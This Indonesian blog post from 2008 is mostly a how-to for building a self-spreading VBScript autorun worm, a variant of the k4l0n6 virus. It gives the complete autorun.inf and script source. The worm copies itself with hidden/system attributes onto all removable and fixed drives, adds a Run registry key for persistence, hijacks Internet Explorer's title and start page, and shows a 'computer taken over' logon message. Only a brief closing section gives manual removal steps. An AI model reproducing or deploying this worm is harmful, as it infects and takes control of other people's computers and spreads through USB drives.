tag:blogger.com,1999:blog-85351226070670570152012-02-16T16:34:44.450-08:00cybernetadynethttp://www.blogger.com/profile/04040316574299983335noreply@blogger.comBlogger11100tag:blogger.com,1999:blog-8535122607067057015.post-60578409076629895652008-11-10T20:30:00.000-08:002008-11-10T20:32:56.885-08:00Membuat dan Menghapus Virus Autorun tanpa AntivirusArtikel ini berguna untuk melengkapi artikel sebelumnya, bahan yang digunakan sebagai sampel virus ini yaitu virus dengan nama k4l0n6 yang telah menginfeksi PC gw. Adapun cara membuat virus autorun sebagai berikut:1. script coding pertama[autorun]<br />shellexecute=wscript.exe k4l0n6.sys.vbs<br /><br />simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda petik)<br /><br />2. script coding kedua<br />‘Kalong-X2<br />‘Varian dari Kalong.VBS<br />on error resume next<br /><br />‘Dim kata-kata berikut<br />dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,kalong,nt,check,sd<br /><br />’siapkan isi autorun<br />isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.sys.vbs”<br />set longka = createobject(”Scripting.FileSystemObject”)<br />set mf = longka.getfile(Wscript.ScriptFullname)<br />dim text,size<br />size = mf.size<br />check = mf.drive.drivetype<br />set text = mf.openastextstream(1,-2)<br />do while not text.atendofstream<br />rekur = rekur & text.readline<br />rekur = rekur & vbcrlf<br />loop<br />do<br /><br />‘buat file induk<br />Set windowpath = longka.getspecialfolder(0)<br />Set syspath = longka.getspecialfolder(1)<br />set tf = longka.getfile(syspath & “\recycle.vbs”)<br />tf.attributes = 32<br />set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)<br />tf.write rekur<br />tf.close<br />set tf = longka.getfile(syspath & “\recycle.vbs”)<br />tf.attributes = 39<br /><br />’sebar ke removable disc ditambahkan dengan Autorun.inf<br />for each desades in longka.drives<br /><br />If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then<br /><br />set tf=longka.getfile(desades.path &”\k4l0n6.sys.vbs”)<br />tf.attributes =32<br />set tf=longka.createtextfile(desades.path &”\k4l0n6.sys.vbs”,2,true)<br />tf.write rekur<br />tf.close<br />set tf=longka.getfile(desades.path &”\k4l0n6.sys.vbs”)<br />tf.attributes = 39<br /><br />set tf =longka.getfile(desades.path &”\autorun.inf”)<br />tf.attributes = 32<br />set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)<br />tf.write isi<br />tf.close<br />set tf = longka.getfile(desades.path &”\autorun.inf”)<br />tf.attributes=39<br />end if<br />next<br /><br />‘Manipulasi Registry<br />set kalong = createobject(”WScript.Shell”)<br /><br />‘Ubah IE Title<br />kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: X2 ATTACK ::”<br /><br />‘Ubah tulisan pertama pada text box menu RUN<br />kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “KALONG-X2/1?<br />kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”<br /><br />‘Buat pesan saat Windows Startup<br />kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “KALONG-X2?<br />kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Komputer Anda Diambil Alih”<br /><br />‘Aktifkan saat Windows Startup<br />kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”<br /><br />‘Ubah Default Start Page Internet Explorer<br />kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.vaksin.com”<br /><br />‘Bonus<br />if check <> 1 then<br />Wscript.sleep 200000<br />end if<br />loop while check <> 1<br />set sd = createobject(”Wscript.shell”)<br />sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname<br /><br />simpan coding tersebut dengan nama dan ekstensi file “k4l0n6.sys.vbs” (tanpa tanda petik)<br /><br />secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi komputer yang kita gunakan. Untuk mengetahui komputer terkena virus autorun dapat menggunakan software iKnowPS sehingga akan terlihat frekuensi tampilan kerja komputer yang terlihat sangat sibuk.<br /><br />Adapun cara menanggulangi virus tersebut yaitu dengan cara<br /><br />- tekan menu Tools > Folder Options… > View > unchek Hide Protected operating system files (Recommended) > yes > OK<br /><br />- sehingga secara otomatis akan terlihat tampilan file virus yang terhidden tersebut<br />- langkah selanjutnya yaitu dengan cara membuka dan mempelajari script coding file virus tersebut. Dan mempelajari bagian-bagian mana saja yang settingannya dirubah, terutama pada register editor (menu run > ketik regedit > OK)<br /><br />- setelah itu, file tersebut dihapus/di delete dari komputer<br /><br />semoga tulisan ini, bisa bermanfaat dan berguna untuk semua orang<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8535122607067057015-6057840907662989565?l=windowstrik.blogspot.com' alt='' /></div>adynethttp://www.blogger.com/profile/04040316574299983335noreply@blogger.com0